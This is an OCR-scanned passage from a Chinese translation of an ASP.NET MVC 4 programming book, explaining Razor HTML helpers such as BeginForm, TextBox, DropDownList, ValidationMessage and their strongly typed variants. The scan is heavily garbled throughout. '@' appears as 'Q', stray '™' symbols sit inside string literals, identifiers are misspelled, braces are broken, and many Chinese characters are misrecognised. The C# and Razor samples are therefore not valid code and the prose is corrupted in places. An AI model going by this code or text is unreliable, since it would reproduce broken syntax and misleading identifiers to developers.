目 动 完成 这 个 计算 ， 如 下 所 示 。 


Qusing (Html .BeginForml("Search", “Home", FormMethod.Get)) { 
<input type="text" name="q" /> 
<input type="submit" value="Search™" /> 


} 


BeginForm HTML 辅助 方法 利用 路 由 引擎 找到 HomeController 控制 右 的 Search 操作 。 
它 在 后 台 使 用 GetVirtualPath 方法 ,该 方法 在 RouteTable 的 Routes 属性 中 一 一 在 global.asax 
中 ， 应 用 程序 注册 所 有 路 由 的 位 置 。 如 果 不 采 用 HTML 辅助 方法 ， 将 不 得 不 编写 下 面 的 所 
有 代码 : 


@1{ 

Var Context = this.ViewContext.RequestContext; 

Var values = new RouteValueDictionaryl 

{ “controller", "home™ }, 1{ "action", "index” |} 

}; 

Var Path = RouteTable.Routes.GetVirtualPath (context, values);} 
} 
<form action="Qpath.VirtualPath”" method="get"> 

<input type="text" name="qgq" /> 

<input type="submit"™" value="Search2"™" /> 


</form> 


最 后 一 个 例子 展示 了 HIML 辅助 方法 的 本 质 : 它们 不 是 村 去 了 程序 员 的 控制 权 , 而 是 
让 他 们 从 大 量 的 编码 工作 中 解脱 出 来 。 
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5.2 HTML 辅助 方法 


可 以 通过 视图 的 Html 属性 调用 HTML 辅助 方法 。 相 应 地 ， 也 可 以 通过 Url 属性 调用 
URL 辅助 方法 ， 通 过 Ajax 属性 调用 Ajax 辅助 方法 。 所 有 这 些 方法 都 有 一 个 共同 的 目标 : 
使 视图 编码 变 得 容易 。 在 控制 器 中 也 存在 有 URL 辅助 方法 。 

大 部 分 的 辅助 方法 都 输出 HIML 标记 ， 尤 其 是 HTML 辅助 方法 。 例 如 ， 前 面 提 到 
BeginForm 辅助 方法 可 以 用 来 为 搜索 表单 构建 一 个 强壮 的 表单 标签 , 而 不 必 编 写 很 多 代码 : 

Qusing (Html .BeginForml("Search", "Home", FormMethod.Get)) { 

<input type="text" name="q" /> 
<input type="submit" value="Search"™" /> 

} 

BeginForm 辅助 方法 输出 的 标记 很 可 能 与 前 面 第 一 次 实现 搜索 表单 时 一 样 。 然 而 ， 在 
后 台 ， 该 辅助 方法 与 路 由 引擎 协调 工作 来 生成 合适 的 URL， 从 而 当 应 用 程序 部 昔 位 置 发 生 
改变 时 ， 使 代码 更 证 有 弹性 。 

注意 ，BeginForm 辅助 方法 和 输出 的 是 起 始 <form> 和 结束 <jform> 标 签 。 辅 助 方法 在 调用 
BeginForm 期 间 生 成 一 个 起 始 标签 ， 并 返回 一 个 实现 了 接口 IDisposable 的 对 象 。 当 视图 中 
的 代码 执行 到 结束 using 语句 的 花 括号 位 置 时 ， 由 于 隐 式 调用 了 Dispose 方法 ， 因 此 辅助 方 
法 会 生成 一 个 </form> 标 签 。 这 里 using 语句 使 得 代码 简洁 而 优雅 。 如 果 发 现 这 样 不 适合 
己 ， 也 可 以 使 用 下 面 的 方法 ， 它 的 代码 看 起 来 前 后 对 称 : 

QA{Html .BeginForm("Search", "Home™", FormMethod.Get);} 

<input type="text" name="qg" /> 


<input type="submit" value="Search™ /> 
Q@{Html .EndForm();} 


乍 一 看 ,辅助 方法 (比如 BeginForm) 好 像 使 程序 员 远 离 了 王牌 一 一 许多 程序 员 想 控制 的 
低级 HTML。 一 旦 开始 使 用 辅助 方法 ， 就 会 意识 到 它们 在 保持 高 效率 的 同时 还 与 王牌 保持 
近 距 离 接 触 。 换 句 话说 ， 我 们 在 不 必 编 写 很 多 代码 来 处 理 细节 问题 的 情况 下 ， 仍 然 可 以 完 
全 控制 HTML。 辅 助 方法 除了 能 生成 尖 括 号 之 外 ， 还 能 正确 地 编码 特性 ， 构 建 指向 正确 次 
源 的 URL， 设 置 输入 元 素 的 名 称 以 简化 模型 绑 定 。 总 之 ， 辅 助 方法 是 程序 员 的 好 朋友 ! 
5.2.1 目 动 编码 


像 任何 其 他 好 朋友 一 样 ，HTML 辅助 方法 可 以 帮助 我 们 摆脱 困境 。 本 章 介绍 的 许多 辅 
助 方法 都 可 以 用 来 输出 模型 值 。 所 有 这 些 输出 模型 值 的 辅助 方法 都 会 在 泻 染 之 前 ， 对 值 进 
行 HTML 编码 。 人 例如， 后面 的 TextArea 辅助 方法 ， 用 来 输出 HTML 元 对 textarea: 

QHtml .TextArea ("text™", "hello <br/> world"™".) 

TextArea 辅助 方法 中 的 第 二 个 参数 是 要 演 染 的 值 。 上 面 例 子 是 回 它 的 值 中 能 入 一 些 
HTML 标记 ， 但 TextArea 辅助 方法 会 产生 下 面 的 标记 : 
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<textarea cols="20" lid="text™" name="text” rows="2"> 
hello &lt;br /&gt; world 
</textarea> 


注意 输出 值 是 经 过 HTML 编码 的 。 默 认 的 编码 可 以 帮助 避免 跨 站 点 脚本 攻击 (Cross 
Site Scripting，XSS)。 第 7 章 将 深入 介绍 路 站 点 脚本 攻击 。 


5.2.2 ”辅助 方法 的 使 用 


在 保护 代码 的 同时 ， 辅 助 方法 也 给 出 了 适当 程度 的 控制 。 为 了 展示 辅助 方法 的 作用 ， 
下 面 列 出 了 BeginForm 辅助 方法 的 男 一 个 重 载 版 本 : 
Qusing (Html .BeginForm("Search", "Home", FormMethod.Get, 
new { target = " blank"™" })) 
{ 
<input type="text" name="qgq" /> 
<input type="submit" value="Search™ /> 
} 
在 这 段 代 码 中 ， 向 BeginForm 方法 的 htmlAttributes 参数 传递 了 一 个 匿名 类 型 的 对 象 。 
在 ASPNET MVC 框架 的 重 载 版 本 中 ， 几 乎 每 一 个 HTML 辅助 方法 都 包含 htmlAttributes 
参数 。 有 了 时 也 可 以 发 现在 某 些 重 载 版 本 中 htmlAttributes 参数 的 类 型 是 IDictionary<string， 
object>。 辅 助 方法 利用 字典 条 目 ( 在 对 象 参 数 的 情形 下 ， 就 是 对 象 的 属性 名 称 和 属性 值 ) 创 
建 辅助 方法 生成 元 素 的 特性 。 例 如 ， 上 面 的 代码 可 生成 如 下 所 示 的 起 始 form 标签 : 


<form action="/Home/Search™" method="get™" target=" blank"> 


可 以 看 到 上 面 使 用 htmlAttributes 参数 设置 了 target="_blank"。 事 实 上 ， 我 们 可 以 使 用 
htmlAttributes 参数 设置 许多 必要 的 特性 值 。 一 开始 可 能 会 觉得 有 些 特性 存在 问题 。 例如， 
设置 元 素 的 class 特性 就 要 求 匿名 类 型 对 销 上 必须 有 一 个 名 为 class 的 属性 ， 或 者 值 的 字典 
中 有 一 个 名 为 class 的 键 。 在 字典 中 有 一 个 “class” 的 键 值 不 是 问题 ， 问 题 在 于 对 象 中 市 有 

-个 名 为 class 的 属性 。 因 为 class 是 C# 语 言 中 的 一 个 保留 关键 学 ， 不 能 用 作 属 性 名 称 或 标 
识 符 ， 所 以 必须 在 class 前 而 加 一 个 @ 符 号 作为 前 级 : 


ausind (Html .BeginForml("Search", "Home", FormMethod.Get, 
new { target = " blank", Alclass="editForm" })) 


另 一 个 问题 是 将 属性 设置 为 带 有 连 字 符 的 名 称 ( 像 data-val)。 在 第 8 章 介绍 框架 的 Ajax 特 
性 时 ， 将 看 到 带 有 连 字 符 的 属性 名 。 带 有 连 字 符 的 C# 属 性 名 是 无 效 的 ， 但 所 有 的 HIML 
辅助 方法 在 泻 染 HTML 时 会 将 属性 名 中 的 下 划 线 转换 为 连 字 符 。 例 如 ， 执 行 下 面 的 视图 
代码 : 

Qusing (Html .BeginForm("Search", "Home", FormMethod.Get, 


new { target = " blank", Qclass="editForm", data validatable=true })) 


将 生成 如 下 的 HTML 代码 : 
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<form action="/Home/Search™ class="editForm" data—validatable="true™ 
method="get™" target=" blank"> 


接 下 来 的 一 节 介 绍 辅 助 方法 的 工作 原理 以 及 其 他 一 些 内 置 辅助 方法 。 
5.2.3 HTML 辅助 万 法 的 工作 原理 


每 一 个 Razor 视图 都 继承 了 它们 基 类 的 Html 属 性 .Html 属 性 的 类 型 是 System.Web.Myvc. 
HtmlHelper<T>， 这 里 的 是 一 个 泛 型 类 型 的 参数 ， 代 表 传 递 给 视图 的 模型 类 型 (默认 是 
dynamic)。 这 个 属性 提供 了 一 些 可 以 在 视图 中 调用 的 实例 方法 ， 比 如 EnableClientValidation 
(选择 性 地 开启 或 关闭 视图 中 的 客户 端 验 证 )。 然 而 ， 上 一 节 中 使 用 的 BeginForm 方法 并 不 
在 这 些 实例 方法 之 中 。 事 实 上 ， 框 架 定义 的 大 多 数 辅助 方法 都 是 扩展 方法 。 

在 智能 感知 窗口 中 ， 当 方法 名 称 左 边 有 一 个 同 下 的 蓝 色 第 头 ( 如 图 5-3 所 示 ) 时 , 就 说 明 这 
个 方法 是 一 个 扩展 方法 。 从 图 5-3 可 以 看 出 ，AntiForgeryToken 是 一 个 实例 方法 ，BeginForm 
是 一 个 扩展 方法 。 


@Html .| 
EBAAction 本 
号 ActionLink 
三 AntiForgeryToken 
| 回 <ul 三 AttrnbuteEncode 
时 BeqinForm 
时 BeqinRouteForm 
时 CheckBox 
Yi CheckBoxFor 
ww Display 
Yi DisplayFor 
wi DisplayForlModel YY 
“<1MEg alti 
<span>»@al 
</11> 


图 5-3 


为 了 构建 HTML 辅助 方法 体系 ,扩展 方法 是 一 种 极其 美妙 的 构建 方式 , 这 主要 有 两 个 
原因 。 首先 , 在 C# 的 扩展 方法 中 只 有 当 在 它 的 名 称 空间 范围 内 ,才能 调用 。ASPNET MVC 
所 有 的 HtmlHelper 扩展 方法 都 在 名 称 空间 System.Web.Mvc.Html 中 ( 缘 于 文件 Views/web. 
config 中 使 用 的 一 个 名 称 衬 间 条 目 ， 默 认 情 况 下 都 在 该 名 称 空间 中 )。 如 果 不 喜 欢 这 些 内 置 
的 扩展 方法 ， 可 以 删除 这 个 名 称 空 间 ， 构 建 目 己 的 方法 。 

然后 , “构建 目 己 的 方法 ”这 人 句 话 带 来 了 第 二 个 好 处 一 一 将 辅助 方法 作为 扩展 方法 。 
我 们 可 以 构建 目 己 的 扩展 方法 来 代替 或 增强 内 置 的 辅助 方法 .第 14 章 会 介绍 如 何 构建 目 定 
义 的 辅助 方法 。 下 面 将 介绍 开 箱 即 用 的 辅助 方法 。 


5.2.4 设置 专辑 编辑 表单 
如 果 需 要 创建 一 个 视图 ， 用 来 让 用 户 编辑 专辑 信息 。 可 以 从 下 面 的 视图 代码 开始 : 


Qusing (Html.BeginEorm()) { 
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QHtml .ValidadationSsSummary (excludePropertyErrors: true) 
<ftieldset> 
<legend>Edit Album</legend> 


<p> 
<input type="submit"™" value="Save™ /> 
</p> 
</fieldset> 
} 


这 段 代 码 包 含有 两 个 辅助 方法 : Html.BeginForm 和 Html.ValidationSummary。 下面 分 
别 对 它们 进行 介绍 ， 首 先 从 Html.BeginForm 开始 。 


1. Html.BeginForm 


前 和 面 示例 已 经 涉及 BeginForm 辅助 方法 。 在 上 而 的 代码 中 ， 不 禹 参数 的 BeginForm 辅 
助 方法 同 当 前 URL 发 送 一 个 HTTP POST 请 求 ， 如 果 视 图 啊 应 了 /StoreManager/Edit/52， 那 
么 起 始 form 标签 的 代码 如 下 所 示 : 


<form action="/StoreManager/Edit/52" method="post"> 
这 种 情形 下 ，POST 就 是 理想 的 请 求 类 型 ， 因 为 这 里 将 要 修改 服务 器 上 的 专辑 信息 。 


2. Html.ValidationSummary 


ValidationSummary 辅助 方法 可 以 用 来 显示 ModelState 字典 中 所 有 验证 错误 的 无 序列 
表 。 使 用 布尔 类 型 参数 ( 值 为 tue) 来 告知 辅助 方法 排除 属性 级 别 的 错误 。 换 而 言 之 ， 就 是 告 
知 ValidationSummary 方法 只 显示 ModelState 中 与 模型 本 身 有 关 的 错误 ， 而 不 显示 那些 与 
具体 模型 属性 相关 的 错误 。 这 里 将 分 开 显示 属性 级 别 的 错误 。 

假设 在 控制 器 操作 中 的 某 处 有 如 下 用 来 泻 染 编辑 视图 的 代 但 : 

ModelSstate.AddModelError(”", "This 1S all wrong! ) 7 

Modelstate.AddModelError("Title™", "What a terrible namel!™)}); 

第 一 个 是 模型 级 别 的 错误 , 因为 代码 中 没有 提供 错误 与 特定 属性 关联 的 键 (或 者 一 个 衬 
键 )。 第 二 个 是 与 Title 属性 相关 联 的 错误 ， 因 此 ， 在 视图 中 的 验证 摘要 区 域 不 会 显示 这 个 
洪 误 (除非 从 辅助 方法 中 删除 参数 “Title” 或 者 把 方法 ValidationSummary 的 参数 值 改 为 
false)。 在 这 种 情形 下 ， 辅 助 方法 泻 染 如 下 所 示 的 HTML 标记 : 


<div class="validation—summary—errors"> 


<ul> 
<1i>This is all wrong'</1i> 
</ul> 
</div> 
ValidationSummary 辅助 方法 的 其 他 重 载 版 本 可 以 提供 标题 文本 ， 也 可 以 设置 特定 的 
HTML 特性 。 


99 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


按照 惯例 ，ValidationSummary 辅助 方法 会 让 CSS 类 validation-summary- 
errors 和 提供 的 任何 特定 CSS 类 一 起 泻 染 。 默认 的 ASPNET MVC 项 目 模板 包 
含 一 些 样 式 ， 使 得 这 些 项 以 红色 显示 ， 如 果 不 羡 欢 这 些 样 式 ， 可 以 在 文件 
style.css 中 进行 修改 。 


5.2.5 ”添加 输入 元 素 


- 量 表 单 和 验证 摘要 设计 完成 ， 就 可 以 在 视图 中 添加 一 些 输入 元 素 让 用 户 来 输入 专辑 
信息 。 下 面 的 代码 演示 了 其 中 一 种 方法 ( 刚 开始 可 以 只 编辑 专辑 的 标题 和 流派 ,但 是 下 面 代 
码 处 理 的 是 真实 音乐 商店 的 Edit 操作 ); 


Qusing (Html .BeginForm()) 
{ 
QHtml .ValidationSsummary (excludePropertyErrors: true) 
<ftieldset> 
<legend>Edit Album</legend> 
<p> 
QHtml .Label ("GenreId") 
QHtml .DropDownList ("GenreId", ViewBag.Genres as SelectL1ist) 
</p> 
<p> 
QHtml .Label ("Title") 
QHtml .TextBox ("Title", Model .Title) 
QHtml .ValidationMessage ("Title") 
</p> 
<ijnput type="submit" value="Save" /> 
</fieldset> 
} 


新 的 辅助 方法 会 加 用 户 展 示 如 下 界 和 而 (如 图 5-4 所 示 ): 


Et 
专 它 并 lacealhost 4 | ty (2 
GOS Home tf Gart (VU) Adrmin 
ASP.NET MVG MUSIG STORE 
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AlbB ur 
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从 上 述 代 码 中 可 看 出 ， 在 视图 中 有 新 的 辅助 方法 : 
® Label 

® DropDownList 

® [extBox 

es ValidationMessage 

® [extArea 

© ListBox 

下 面 首先 介绍 TextBox 辅助 方法 。 


1. Html.TextBox 和 Html.TextArea 

TextBox 辅助 方法 泻 染 一 个 type 特性 为 text 的 input 标签 ,我 们 一 般 利 用 TextBox 辅助 
方法 接收 用 户 目 由 形式 的 输入 。 例 如 ， 下 面 形 式 的 调用 : 

QHtml .TextBox ("Title™", Model].Title) 

会 生成 如 下 所 示 的 HTML 标记 : 


<input 1id="Title™” name="Title" type="text™" 
value="For Those About To Rock We Salute You™ /> 


与 其 他 的 HIML 辅助 方法 类 似 ，TextBox 辅助 方法 也 为 一 些 HTML 特性 设置 (正如 本 
章 前 面 演示 的 ) 提 供 了 重 载 。TextBox 辅助 方法 的 一 个 兄弟 方法 就 是 TextArea 辅助 方法 。 下 
面 的 代码 演示 了 使 用 TextArea 方法 泻 染 一 个 能 够 显示 多 行文 本 的 <textarea> 元 素 : 


QHtm]l .TextArea ("text™", "hello <br/> world"™) 


上 述 代 码 泻 染 的 HTML 标记 如 下 : 


<textarea cols="20"™ id="text" name="text™ rows="2">hello &lt;br /&gt; world 
</textarea> 


再 次 注意 , 辅助 方法 如 何 将 值 编 码 为 输出 形式 (所 有 的 辅助 方法 都 对 模型 值 和 特性 值 进 
行 编 色 )。 TextArea 辅助 方法 的 其 他 草 载 版 本 可 以 通过 指定 显示 的 行 数 和 列 数 来 控制 文本 区 
域 的 大 小 : 

QHtm]l .TextArea ("text™", “hello <br /> world"™", 10, 80, null) 

这 行 代 码 将 生成 如 下 所 示 的 HTML 标记 : 


<textarea cols="80" id="text" name="text" rows="10">hello &lt;br /&at; 
WOorild 
</textarea> 


2. HIML.Label 


Label 辅助 方法 返回 一 个 <label/> 元 素 ， 并 使 用 String 类 型 的 参数 来 决定 泻 染 的 文本 和 
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for 特性 值 。. 它 的 一 个 重 载 版 本 允许 独立 地 设置 for 特性 和 要 演 染 的 文本 。 在 上 面 的 代码 中 ， 
调用 Html.Label("GenrelId") 会 生成 如 下 所 示 的 HIML 标记 : 


<label for="GenrelId">Genre</label> 


如 果 以 前 没有 使 用 过 label 元 素 ， 那 么 现在 可 能 极 想 知道 这 个 元 素 是 否 有 存在 的 价值 。 
其 实 ，label 的 作用 就 是 为 其 他 输入 元 素 ( 比 如 文本 输入 元 素 ) 显 示 附 加 信息 ， 这 样 可 以 为 用 
户 提 供 人 性 化 的 界面 ， 从 而 增强 应 用 程序 的 可 访问 性 。label 的 for 特性 应 该 包含 相关 输入 
元 素 的 ID( 在 这 个 例子 的 HTML 标记 中 ， 紧 跟 其 后 的 输入 元 素 是 Genre 的 下 拉 列 表 )。 呈 现 
的 界面 可 以 利用 label 的 文本 为 用 户 提 供 有 关 输 入 的 详细 描述 。 男 外 ， 如 果 用 户 单 击 label， 
那么 浏览 右 会 把 焦点 传送 给 相关 的 输入 控件 。 这 一 点 对 于 复 选 框 和 单 选 按钮 特别 有 用 ， 因 
为 这 样 可 以 为 用 户 提 供 更 大 的 单 击 区 域 ， 而 不 只 是 复 选 框 和 单 选 按 钮 本 号。 

细心 的 读者 可 能 已 经 注意 到 label 泻 染 的 文本 不 是 “GenreId”( 传 递 给 辅助 方法 的 字符 
串 )， 而 是 “Genre”。 在 可 能 的 情况 下 ， 辅 助 方法 使 用 任何 可 用 的 模型 元 数据 来 生成 显示 内 
容 。 下 面 探讨 表单 剩余 的 其 他 辅助 方法 ， 之 后 再 回 到 这 个 主题 。 

3. Html.DropDownList 和 Html.ListBox 


DropDownList 和 ListBox 辅助 方法 都 返回 一 个 <select 和 元素。DropDownList 允许 进 
行 单项 选择 ， 而 ListBox 文 持 多 项 选择 (在 要 洽 染 的 标记 中 ， 把 multiple 特性 的 值 设 置 为 


multiple)。 
通常 情况 下 ，select 元 素 有 两 个 作用 : 


e 展示 可 选项 的 列表 

e 展示 字段 的 当前 值 

MVC Music Store 中 的 Albunm 类 有 一 个 Genreld 属性 。 可 以 使 用 select 元 素来 显示 
Genreld 属性 的 值 和 所 有 其 他 可 选项 。 

由 于 这 些 辅助 方法 都 需要 一 些 特定 的 信息 ， 因 此 当 在 控制 器 中 使 用 时 ， 还 需要 做 一 点 
设置 工作 。 下 拉 列 表 也 不 例外 ， 它 需要 一 个 包含 所 有 可 选项 的 SelectListItem 对 象 集合 ， 其 
中 每 一 个 SelectListItem 对 象 中 又 包含 有 Text、Value 和 Selected 三 个 属性 。 可 以 根据 需要 
构建 目 己 的 SelectListItem 对 象 集合 ， 也 可 以 使 用 框架 中 的 SelectList 或 MultiSelectList 辅助 
方法 类 来 构建 。 这 些 类 可 以 但 看 任意 类 型 的 下 numerable 对 象 并 将 其 转换 为 SelectListItem 对 
象 的 序列 。 例 如 ，StoreManasger 控制 器 中 的 Edit 操作 : 

public ActionResult Edit (int 1id) 


{ 
Var album = storeDB.Albums.Singlel(a => 引 .AlbumId == 1Q) ; 


ViewBag.Genres = new SelectList(storeDB.Genres.OrderByl(g => 可 .Namel) ， 
"GenreId", "Name", album.GenrelId).: 


return View (album),; 


} 
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这 里 的 控制 器 操作 不 仅 构 建 了 主要 模型 (用 于 编辑 的 专辑 )， 还 构建 了 下 拉 列 表 辅 助 方 
法 所 需要 的 表示 模型 。 从 上 面 的 代码 可 以 看 出 ，SelectList 构造 函数 的 参数 指定 了 原始 集合 
(数据 库 中 的 Genres 表 )、 作 为 后 台 值 使 用 的 属性 名 称 (GenreId)、 作 为 显示 文本 使 用 的 属性 
名 称 (Name) 以 及 当前 所 选项 的 值 ( 它 决 定 将 哪 一 项 标记 为 选择 项 )。 

如 果 想 在 避免 反射 开销 的 同时 还 想 目 己 生 成 SelectListItem 集合 ， 可 以 使 用 LINQ 的 
Select 方法 来 将 SelectListItem 对 象 集 放 入 项 目 Genres 中 : 


public ActionResult Edit (int id) 


{ 
Var album = storeDB.Albums.Singlel(a => a.Albumld == id); 


ViewBag.Genres = 
storeDB .Genres 
.OrderBy(g => g .Name) 
.AsEnumerablel() 
.Select(g => new SelectListItem 
{ 
Text = g.Name, 
Value = g.GenrelId.ToSsString(), 
Selected = album.Genreld == g.GenrelId 
}); 
return View(album); 
} 
4. Html.ValidationMessage 


当 ModelState 字典 中 的 某 一 特定 字段 出 现 错误 时 ,可 以 使 用 ValidationMessage 辅助 方 
法 来 显示 相应 的 错误 提示 消息 。 例 如 ， 在 下 面 的 控制 右 操 作 中 ， 为 了 说 明 问 题 ， 故 意 在 模 
型 状态 中 为 Title 属性 添加 了 一 个 错误 : 


[HttpPost | 
public ActionResult Edit(int id, FormCollection collection) 
{ var album = storeDB.Albums .Find(id)}); 


Modelstate.AddModelError ("Title", "What a terrible name!").,， 


return View (album); 


} 

在 视图 中 可 以 用 下 和 耐 这 行 代 人 码 显 示 错 误 提 示 消 奶 ， 如 果 有 的 话 : 
QHtml .ValidationMessage ("Title"™) 

执行 后 生成 的 HTML 标记 如 下 : 


<Span class="field-validation-error" data—valmsg—for="Title”™ 
data—valmsg—replace="true"> 
What a terriblje name! 
</span> 
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这 条 消息 只 有 当 键 值 “Title” 在 模型 状态 中 出 现 错误 时 才 会 出 现 。 也 可 以 调用 
(@Html.ValidationMessage 的 一 个 重 写 方法 来 重 写 视 图 中 的 错误 提示 消息 : 


QHtml .ValidationMessage ("Title", "Something is wrong with YOUT 七 I 七 1e”) 


上 述 代 码 泻 染 的 HTML 形式 为 : 


<Span class="field-validation-error" data—valmsg—for="Title”™ 
data—valmsg-replace="false">Something 1is wrong with your title 


按照 惯例 ， 当 出 现 错 误 时 , 这 个 辅助 方法 会 将 CSS 类 field-validation-error 
和 提供 的 任何 特定 CSS 类 一 起 泻 染 。 默 认 的 ASPNET MVC 项 目 模 板 自 带 了 
一 些 样式 ,使 得 这 些 项 能 够 以 红色 显示 ， 如 果 不 喜 欢 ， 可 在 style.css 文件 中 修 
改 这 些 样式 。 


到 目前 为 止 ， 已 经 介绍 了 辅助 方法 的 一 些 共同 特性 ， 如 HIML 编码 和 HIML 特性 的 
设置 ， 此 外 ， 当 谈 到 人 处理 模型 值 和 模型 状态 时 ， 所 有 的 表单 输入 特性 还 有 一 些 共同 行为 。 
5.2.6 ”辅助 方法 、 模 型 和 视图 数据 

辅助 方法 提供 了 对 HTML 细 粒 度 控 制 的 同时 带 走 了 构建 UI 要 在 合适 的 位 置 显示 控 
件 、 标 签 、 错 误 消 息 和 值 ) 的 乏味 工作 。 辅 助 方法 如 Html.TextBox 和 Html.DropDownList( 以 
及 其 他 所 有 表单 辅助 方法 ) 检 查 ViewData 对 象 以 获得 要 显示 的 当前 值 (在 ViewBag 对 象 中 的 
所 有 值 也 可 以 通过 ViewData 得 到 )。 

现在 暂时 不 考虑 要 创建 的 编辑 表单 ， 而 是 看 一 个 人 简单 的 例子 。 如 果 想 在 一 个 表单 中 设 
置 专辑 的 价格 ， 可 使 用 下 面 的 控制 融 代 码 。 

public ActionResult Edit (int 1d) 

{ 

ViewBag.Price = 10.0; 


return View(); 


} 

在 相应 的 视图 中 ， 使 用 ViewBasg 中 的 值 来 为 TextBox 辅助 方法 命名 ， 可 以 实现 演 染 显 
示 价 格 的 文本 框 : 

QHtm]l .TextBox ("Price"™) 

TextBox 辅助 方法 将 生成 如 下 所 示 的 HTML 标记 : 

<input id="Price™" name="Price™" type="text" Value="10” /> 

当 辅 助 方法 香 看 ViewData 里 面 的 内 容 时 ， 它 们 也 能 看 到 其 中 的 对 象 属性 。 参 上 照 下 面 
代码 ， 修 改 先前 的 控制 器 操作 : 
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public ActionResult Edit (int id) 

{ 
ViewBag.Album = new Album {Price = 111}; 
return View(); 


} 

在 相应 的 视图 中 ， 可 以 用 下 和 面 这 行 代码 来 显示 一 个 带 有 专辑 价格 的 文本 框 : 

QHtm]l .TextBox ("Album.Price") 

现在 演 染 出 的 HTML 标记 如 下 所 示 : 

<input id="Album Price” name="Album.Price"” type="text™” value="]11" /> 


如 果 在 ViewData 中 没有 匹配 “Album Price” 的 值 ， 那 么 辅助 方法 将 尝试 查找 与 第 一 


个 点 之 前 那 部 分 名 称 (Album) 匹 配 的 值 。 换 言 之 ， 就 是 找 一 个 Album 类 型 的 对 象 。 然 后 ， 
辅助 方法 估 测 名 称 中 剩余 的 部 分 (Price)， 并 找到 相应 的 值 。 


注意 泻 染 得 到 的 input 元 素 的 id 特性 值 使 用 下 划 线 代替 了 点 (但 name 特 性 依然 使 用 点 )。 


之 所 以 这 样 做 , 是 因为 在 id 特性 中 包含 点 是 非法 的 ,因此 , 运行 时 用 静态 属性 HtmlHelperId 
AttributeDotReplacement 的 值 代替 了 点 。 如 果 没 有 有 效 的 14d 特 性 ,就 无 法 执行 之 有 JavaScript 
库 ( 如 jQuery) 的 客户 端 脚本 。 


TextBox 辅助 方法 依 笔 蝇 类 型 视图 数据 也 能 很 好 地 工作 。 例 如 ， 下 面 代码 展示 的 控制 


器 Edit 操作 : 


public ActionResult Edit (int id) 
{ 


Var album = new Album {Price = 12 .um 上; 
return View (album); 
1 
现在 回 到 ， 为 TextBox 辅助 方法 提供 属性 名 称 来 显示 信息 : 
QHtml .TextBox ("Price™); 
针对 上 面 的 代码 ， 辅 助 方法 将 生成 如 下 所 示 的 HTML 标记 : 


<input id="Price™" name="Price™" type="text" value="12.0™ /> 


如 果 想 避免 目 动 地 碍 找 数据 ， 可 回 表 单 辅助 方法 提供 一 个 显 式 的 值 。 有 时 ， 显 式 提 供 


值 的 方法 是 必需 的 。 返 回 到 刚才 正在 构建 (用 来 编辑 专辑 信息 ) 的 表单 。 控 制 器 操作 代码 
如 下 : 


public ActionResult Edit (int 1d) 
{ 
Var album = storeDB.Albums.Singlel(a => a.AlbumlId == 1Q) ; 


ViewBag.Genres = new SelectList (storeDB.Genres.O0rderByl(g => g.Name), 
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"GenrelId", "Name", album.GenrelId);} 
return View (album).; 


} 
在 Album 的 强 类 型 编辑 视图 内 部 ， 可 使 用 下 和 耐 这 行 代码 为 专辑 标题 演 染 一 个 输入 
元 又: 


QHtml .TextBox ("Title™", Model.Title) 


方法 中 的 第 二 个 参数 显 式 地 提供 了 数据 值 。 为 什么 呢 ? 原 来 在 这 种 情形 下 ， 音 乐 商店 


的 专辑 编辑 视图 像 许 多 其 他 视图 一 样 ， 也 把 页 面 标题 放 在 了 ViewBag.Title 属性 中 ， 因 此 
Title 值 已 经 存储 在 ViewData 中 。 在 Edit 视图 的 顶部 可 以 看 到 如 下 内 容 : 
@1{ 
ViewBag.Title = "Edit — ”二 Model.Title; 
} 


应 用 程序 的 _Layout.cshtml 视图 通过 检索 ViewBag.Title 值 来 设置 泻 染 页 面 的 标题 。 如 
果 只 向 调用 的 TextBox 辅助 方法 传递 字符 串 Title, 那么 它 就 在 ViewBasg 中 查找 并 提取 出 里 
面 的 Title 值 (辅助 方法 在 查找 强 类 型 模型 对 象 之 前 ， 会 首先 查看 ViewBag)。 这 种 情形 下 ， 
为 了 显示 合适 的 值 ， 我 们 需要 提供 显 式 值 。 这 是 一 个 重要 而 微妙 的 经 验 司 示 。 在 大 型 应 用 
程序 中 ， 为 了 更 加 清晰 地 确定 在 哪里 使 用 数据 ， 我 们 需要 在 一 些 视图 数据 项 前 深 加 前 绥 。 
例如 ， 我 们 不 把 主页 标题 命名 为 ViewBag.Title， 而 是 命名 为 诸如 ViewBag.Page Title 的 名 
称 ， 这 样 就 避免 了 与 特定 页 面 的 命名 冲突 。 


5.2.7 强 类 型 辅助 方法 


如 果 不 适 应 使 用 字符 串 字 面值 从 视图 数据 中 提取 值 的 话 ， 也 可 以 使 用 ASPNET MVC 
提供 的 强 类 型 辅助 分 类 方法 。 使 用 这 个 强 类 型 辅助 方法 ， 只 需 为 它 传递 一 个 lambda 表达 式 
来 指定 要 泻 染 的 模型 属性 。 表 达 式 的 模型 类 型 必须 和 为 视图 指定 的 模型 类 型 (使 用 @model 
指令 ) 一 致 。 对 于 专辑 模型 的 强 类 型 视图 ， 需 要 在 视图 顶部 输入 如 下 所 示 的 代码 : 


Qlmodel MycMusicSstore.Models .Album 


- 旦 添加 模型 指令 ， 束 可 以 使 用 下 面 的 代码 重 写 前 面 的 专辑 编辑 表单 : 


Qusing (Html. BeginFEormr 1) ) 
{ 
QHtml .ValidationSsummary (excludePropertyErrors: true) 
<ftieldset> 
<legend>Edit Album</legend> 
<p> 
QHtm] .LabelFor (m => m.GenreId) 
QHtml] .DropDownListFor(m => m.GenrelId, ViewBag.Genres as 
SelectList) 


</p> 
<p> 
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QHtml .TextBoxFor (m => m.Title) 
QHtml .ValidationMessageFor (m => m.Title) 
</p> 
<input type="submit"™" value="Save™" /> 
</fieldset> 

} 

注意 ， 这 些 强 类 型 的 辅助 方法 名 称 除 了 有 “For” 后 弘之 外 ， 跟 先前 使 用 的 辅助 方法 还 
有 相同 的 名 称 。 尽 管 该 代码 生成 了 与 先前 代码 同样 的 HIML 标记 ， 但 是 用 lambda 表达 式 
代替 字符 串 还 有 许多 其 他 好 处 ， 其 中 包括 智能 感知 、 编 译 时 检查 和 轻松 的 代码 重 构 ( 如 果 在 
模型 中 改变 一 个 属性 的 名 称 ，Visual Studio 会 自动 修改 视图 中 的 对 应 代码 )。 

- 般 情 况 下 ， 可 为 处 理 模型 数据 的 每 个 辅助 方法 找到 一 个 与 其 对 应 的 强 类 型 方法 ， 第 

4 章 介 绍 的 内 置 基 架 就 是 尽 可 能 地 使 用 这 些 强 类 型 辅助 方法 。 

注意 这 里 没有 显 式 地 为 Title 文本 框 设 置 值 ， 这 主要 是 因为 lambda 表达 式 癌 辅助 方法 
